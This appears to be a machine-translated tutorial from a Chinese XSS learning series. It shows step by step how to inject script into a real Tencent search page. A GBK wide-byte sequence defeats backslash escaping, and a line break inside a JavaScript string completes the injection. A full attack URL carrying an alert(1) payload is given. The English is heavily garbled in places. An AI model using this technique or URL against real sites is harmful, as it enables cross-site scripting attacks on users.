This time, three guys are together ~
1. The instance points are as follows:
Http://cgi.data.tech.qq.com/index.php? Mod = search & type = data & site = digi & libid = 2 & curpage = 1 & pagenum = 30 & filterattr = 138,138 | 16 | 3500, 4000 & filtervalue =, % B4 % F3 % D3 % DA4000 | % D0 % FD % D7 % AA | WCDMA, WCDMA, hsdpa, hsdpa&tplname=centersearch.shtml & orderby = aaaaaaaaaaaa
Old Rules: continue to look at our output.
2. There are three outputs in total, which are located in the HTML attribute. We gave up because double quotation marks are eliminated. There are still two places left. They are all located in <script>... </script> and together.
3. Let's first look at 2nd. Is it similar? Yes. I just met it in tutorial 6. That is, the output is in the [comment. Can we use line breaks?
4. One is good news, and the other is bad news .. The following is a good thing .. Swollen.
5. At this time, we need to first talk about javascript.
Javascript. Strings can be written in multiple lines below.
Var a = "I Am a string \
I am still a string ";
Alert ();
6. Based on this, we can create the defect points as shown below.
// Document. getElementById ("order_select"). value = "aaaa \
Alert (1 );//";
Var searchOrder = "aaaa \
Alert (1 );//";
The code structure is parsed as follows:
7. With this idea, please refer to our backslash ..
8. The tragedy is that the backslash is filtered into two \, which is hard to solve.
9. Do you still remember the wide byte usage we mentioned in tutorial 4? % C0 can be eaten.
Let's take a look at the page encoding.
<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312"/>
Gbxxx series.
10. So, our % c0 also joined the battle.
Http://cgi.data.tech.qq.com/index.php? Mod = search & type = data & site = digi & libid = 2 & curpage = 1 & pagenum = 30 & filterattr = 138,138 | 16 | 3500, 4000 & filtervalue =, % B4 % F3 % D3 % DA4000 | % D0 % FD % D7 % AA | WCDMA, WCDMA, hsdpa,hsdpa&tplname=centersearch.shtml & orderby = aaaa % c0 % 5c % 0 aalert (1 );//
Look at the output in the source code. \ We turned it into garbled code + \
11. At this time, punctuation marks are in a meeting. The theme of the meeting is: "Hello everyone, it's really good"
Solution:
Follow the previous tutorial:
In those years, we will learn XSS-4. byte revenge record [QQ mail Basics]
In those years, we will learn XSS-5. backlash revenge
In those years, we learned XSS-6. newline character revenge